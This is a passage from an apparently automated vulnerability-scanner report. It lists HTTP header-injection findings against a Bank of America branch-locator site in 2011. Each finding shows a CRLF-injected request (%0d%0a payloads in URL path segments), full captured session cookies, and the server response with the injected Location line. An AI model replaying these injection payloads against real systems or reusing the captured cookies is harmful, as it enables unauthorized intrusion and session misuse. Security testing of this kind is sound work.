Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%7D

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:01 GMT
Server: Apache
Set-Cookie: JSESSIONID=E5FB2C038416347E100F0DEC86916493.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/d0c3a
d1cf653e3bb/pushpins_CSS.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.194. http://locators.bankofamerica.com/locator/locator/jsp/content/pushpins_CSS.jsp [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/content/pushpins_CSS.jsp

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 3f40c%0d%0a4796dbea343 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/jsp/content/3f40c%0d%0a4796dbea343 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296076997; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%7D

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=F7C8B3FF6266CE3AE14D6018C729FB41.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/jsp/content/3f40c
4796dbea343?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.195. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/bg.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/bg.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 91ef7%0d%0aeafaf1cc662 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/onlineopinionOO4S/91ef7%0d%0aeafaf1cc662 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; session_start_time=1309296047183; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:00 GMT
Server: Apache
Set-Cookie: JSESSIONID=90D6615AC521DAE3BC59B5C87A5110AC.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/91ef7
eafaf1cc662?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.196. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/bgo.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/bgo.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload e9fb7%0d%0a2d60ea5ca2b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/onlineopinionOO4S/e9fb7%0d%0a2d60ea5ca2b HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; session_start_time=1309296047183; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:51 GMT
Server: Apache
Set-Cookie: JSESSIONID=7B0B772B5637291A95F5082917A96934.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/e9fb7
2d60ea5ca2b?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.197. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/oo_conf_en-US_float.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/oo_conf_en-US_float.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f1416%0d%0a9bba475338b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/onlineopinionOO4S/f1416%0d%0a9bba475338b HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=25E8DA7370DADBDA52A23AE38EA53FFB.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/f1416
9bba475338b?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.198. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/oo_engine_c.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/oo_engine_c.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d85a1%0d%0a1453ab77026 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/onlineopinionOO4S/d85a1%0d%0a1453ab77026 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:22 GMT
Server: Apache
Set-Cookie: JSESSIONID=3C02C63DD89816B95E868519B170D271.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/d85a1
1453ab77026?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.199. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/oo_style-p.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/oo_style-p.css

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f56c9%0d%0ae131a1c9756 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/onlineopinionOO4S/f56c9%0d%0ae131a1c9756 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=D5412B28D96AFD87A67B6F6541AFF955.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/f56c9
e131a1c9756?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.200. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/oo_style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/oo_style.css

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload b21ad%0d%0aee409803e9d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/onlineopinionOO4S/b21ad%0d%0aee409803e9d HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=4AD38CF2B8048BE97B5134E23AA13ED2.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/b21ad
ee409803e9d?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.201. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/sm_000_oo-noani.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/sm_000_oo-noani.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload b462b%0d%0af69eec0bb95 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/onlineopinionOO4S/b462b%0d%0af69eec0bb95 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; session_start_time=1309296047183; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:51 GMT
Server: Apache
Set-Cookie: JSESSIONID=AC196BFF7ACF1C21B9F7AF8507C6320B.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/b462b
f69eec0bb95?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.202. http://locators.bankofamerica.com/locator/locator/scripts/PageStates.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/PageStates.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 41db1%0d%0ae3d124d3015 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/41db1%0d%0ae3d124d3015 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=BC22FCBCAAB6D8416791E3133630D4ED.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/41db1
e3d124d3015?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.203. http://locators.bankofamerica.com/locator/locator/scripts/StartANewSearch_js.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/StartANewSearch_js.jsp

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 24487%0d%0ab2360a414a1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/24487%0d%0ab2360a414a1/StartANewSearch_js.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=A83C63001C341A25954F723B6E52C1A6.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/24487
b2360a414a1/StartANewSearch_js.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.204. http://locators.bankofamerica.com/locator/locator/scripts/StartANewSearch_js.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/StartANewSearch_js.jsp

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c6f74%0d%0ab547424b770 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/c6f74%0d%0ab547424b770 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:05 GMT
Server: Apache
Set-Cookie: JSESSIONID=4893EFD3F021C720A25F54A158070829.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/c6f74
b547424b770?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.205. http://locators.bankofamerica.com/locator/locator/scripts/footprintMapAndBalloon_js.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/footprintMapAndBalloon_js.jsp

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c4b97%0d%0a7b3a0be0883 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/c4b97%0d%0a7b3a0be0883/footprintMapAndBalloon_js.jsp HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:14 GMT
Server: Apache
Set-Cookie: JSESSIONID=2A435838BEF85EEBDFACCB8D0FE8979A.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/c4b97
7b3a0be0883/footprintMapAndBalloon_js.jsp?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.206. http://locators.bankofamerica.com/locator/locator/scripts/footprintMapAndBalloon_js.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/footprintMapAndBalloon_js.jsp

Issue detail

